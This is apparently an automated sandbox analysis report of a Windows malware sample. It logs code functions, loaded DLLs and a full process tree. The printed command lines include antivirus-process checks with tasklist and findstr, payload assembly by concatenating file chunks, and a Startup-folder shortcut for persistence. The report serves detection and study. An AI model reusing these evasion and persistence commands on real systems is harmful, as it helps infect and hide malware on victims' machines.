Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E2282A	10_2_00E2282A
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E389BF	10_2_00E389BF
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E36A74	10_2_00E36A74
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E80A3A	10_2_00E80A3A
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E10BE0	10_2_00E10BE0
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E5EDB2	10_2_00E5EDB2
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E2CD51	10_2_00E2CD51
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E80EB7	10_2_00E80EB7
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E68E44	10_2_00E68E44
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E36FE6	10_2_00E36FE6
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E233B7	10_2_00E233B7
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E1D45D	10_2_00E1D45D
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E2F409	10_2_00E2F409
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E0F6A0	10_2_00E0F6A0
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E216B4	10_2_00E216B4
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E01663	10_2_00E01663
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E1F628	10_2_00E1F628
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E278C3	10_2_00E278C3
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E2DBA5	10_2_00E2DBA5
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E21BA8	10_2_00E21BA8
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E39CE5	10_2_00E39CE5
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E1DD28	10_2_00E1DD28
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E21FC0	10_2_00E21FC0
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E2BFD6	10_2_00E2BFD6
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008EB020	16_2_008EB020
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008E94E0	16_2_008E94E0
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008E9C80	16_2_008E9C80
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_009023F5	16_2_009023F5
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00968400	16_2_00968400
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00916502	16_2_00916502
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008EE6F0	16_2_008EE6F0
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0091265E	16_2_0091265E
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0090282A	16_2_0090282A
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_009189BF	16_2_009189BF
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00960A3A	16_2_00960A3A
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00916A74	16_2_00916A74
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008F0BE0	16_2_008F0BE0
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0093EDB2	16_2_0093EDB2
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0090CD51	16_2_0090CD51
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00960EB7	16_2_00960EB7
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00948E44	16_2_00948E44
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00916FE6	16_2_00916FE6
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_009033B7	16_2_009033B7
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0090F409	16_2_0090F409
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008FD45D	16_2_008FD45D
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_009016B4	16_2_009016B4
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008EF6A0	16_2_008EF6A0
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008FF628	16_2_008FF628
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008E1663	16_2_008E1663
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_009078C3	16_2_009078C3
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0090DBA5	16_2_0090DBA5
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00901BA8	16_2_00901BA8
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00919CE5	16_2_00919CE5
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008FDD28	16_2_008FDD28
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0090BFD6	16_2_0090BFD6
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00901FC0	16_2_00901FC0

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: String function: 00908B30 appears 42 times
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: String function: 008F1A36 appears 34 times
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: String function: 00900D17 appears 70 times
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: String function: 004062A3 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: String function: 00E28B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: String function: 00E20D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: String function: 00E11A36 appears 34 times

PE / OLE file has an invalid certificate

Source: cW5i0RdQ4L.exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Source: cW5i0RdQ4L.exe, 00000000.00000003.1718798181.0000000000644000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs cW5i0RdQ4L.exe
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAutoIt3.exeB vs cW5i0RdQ4L.exe
Source: cW5i0RdQ4L.exe, 00000000.00000002.1719275870.0000000000644000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs cW5i0RdQ4L.exe

Uses 32bit PE files

Source: cW5i0RdQ4L.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: cW5i0RdQ4L.exe

Static PE information: Section: .reloc ZLIB complexity 1.002685546875

Source: classification engine

Classification label: mal96.expl.evad.winEXE@28/18@3/1

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E6A6AD GetLastError,FormatMessageW,

10_2_00E6A6AD

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E58DE9 AdjustTokenPrivileges,CloseHandle,	10_2_00E58DE9
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E59399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	10_2_00E59399
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00938DE9 AdjustTokenPrivileges,CloseHandle,	16_2_00938DE9
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00939399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	16_2_00939399

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

0_2_004044A5

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E64148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

10_2_00E64148

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E6443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

10_2_00E6443D

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

File created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:120:WilError_03

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

File created: C:\Users\user\AppData\Local\Temp\nsk814.tmp

Jump to behavior

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Centres Centres.bat & Centres.bat

Source: cW5i0RdQ4L.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: cW5i0RdQ4L.exe

Virustotal: Detection: 13%

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

File read: C:\Users\user\Desktop\cW5i0RdQ4L.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\cW5i0RdQ4L.exe "C:\Users\user\Desktop\cW5i0RdQ4L.exe"
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Centres Centres.bat & Centres.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 103495
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "aroundaccommodategroupseverything" Fine
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Correct + ..\Transparent + ..\Barbie + ..\Gloves + ..\Latin + ..\Story + ..\Ski + ..\Appraisal n
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Powder.pif n
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url" & echo URL="C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js"
Source: C:\Windows\SysWOW64\findstr.exe	Process created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\O"
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Centres Centres.bat & Centres.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 103495	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "aroundaccommodategroupseverything" Fine	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Correct + ..\Transparent + ..\Barbie + ..\Gloves + ..\Latin + ..\Story + ..\Ski + ..\Appraisal n	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Powder.pif n	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url" & echo URL="C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url" & exit	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\O"	Jump to behavior

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
